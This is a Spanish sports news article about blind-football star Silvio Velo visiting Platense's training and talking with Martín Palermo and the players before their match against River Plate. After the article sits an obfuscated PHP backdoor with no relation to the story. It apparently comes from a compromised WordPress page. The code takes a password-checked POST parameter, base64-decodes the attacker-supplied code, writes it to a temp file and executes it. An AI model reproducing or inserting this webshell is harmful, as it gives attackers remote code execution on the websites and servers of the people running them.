Encuentro de goleadores: Silvio Velo y Martín Palermo compartieron una tarde en Platense

Silvio Velo estuvo presente en el último entrenamiento de Platense antes del partido ante River Plate, por la decimoséptima fecha del campeonato de la Liga Profesional. El histórico delantero y goleador de Los Murciélagos, la Selección Argentina de fútbol de ciegos, mantiene una vieja amistad con Martín Palermo, quien lo invitó a pasar una jornada con el plantel calamar.

“Martín estuvo como siempre cálido y amable, hablamos un rato y hasta se animó a ponerse el antifaz que usamos en fútbol para ciegos y tiramos unos pases. También le regalé mi libro infantil Pelota de cascabel y una ensaimada de San Pedro. Es un amigo de muchos años”, señaló Velo.

El técnico de Platense le pidió a Velo una charla motivacional apuntando al partido ante River Plate líder del campeonato. Los jugadores lo escucharon atentamente y le dedicaron una ovación.

“Les dije de dónde venía y lo importante que fue el fútbol en mi vida. Que yo, con cada uno de ellos, compartía la misma pasión por la pelota. Que contra River dejen todo, como siempre lo hacen. Que es el partido. Que vayan con fe, con ganas y que tienen todo para ganar”, contó Velo.

Además, Ignacio Schor se animó a ponerse el antifaz, igual que Palermo, y jugaron con la típica pelota con cascabeles -regalo de Velo- que se utiliza en los partidos de fútbol para ciegos.

“Veníamos amagando hace rato, y ayer Martín me mandó un mensaje invitándome a pasar. Fue una muy linda experiencia”, le dijo anoche el bicampeón mundial con Argentina a IAM Noticias.

“Silvio es un ejemplo de deportista. Y un ejemplo de vida para todos. Nació ciego y eso no fue un impedimento para que formara una gran familia e hiciera una carrera deportiva extraordinaria donde ganó campeonatos mundiales y medallas paralímpicas con Los Murciélagos. Su visita fue una alegría para todos. Nos dejó su mensaje, que en la vida todo se puede si lo hacemos con amor y dedicación. Si el partido de River ya nos motivaba, después de la charla con Silvio estamos todavía más”, afirmó Palermo.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}